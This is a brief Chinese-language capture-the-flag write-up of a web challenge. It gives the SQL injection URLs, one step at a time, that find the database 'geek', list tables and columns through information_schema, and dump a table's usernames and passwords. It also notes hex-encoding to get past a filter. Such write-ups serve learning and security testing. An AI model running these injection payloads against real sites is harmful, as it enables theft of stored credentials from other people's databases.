上图~~~
哇,该死的我看到tip就知道该怎么做了。不罗嗦,直接查数据库。上图先试了下二次注入,然后就是试不下去了,直接查吧!试了试发现其中有过滤机制。
先查库:?username=admin&password=ad'%20union%20select%201,database(),2%23
发现在geek库
接下来查表:?username=admin&password=ad'%20union%20select%201,2,concat(table_name)%20from%20information_schema.tables%20where%20table_schema='geek'%23
推断flag在l0ve1ysq1里面
查字段:?username=admin&password=ad'%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='l0ve1ysq1'%23
发现里面有id、username、password
这里直接查字段的值:?username=admin&password=ad'%20union%20select%201,2,group_concat(concat(0x7e,username,password))%20from%20geek.l0ve1ysq1%23
得到flag。
注意:上述中where后面单引号里的内容在我的操作下化为了十六进制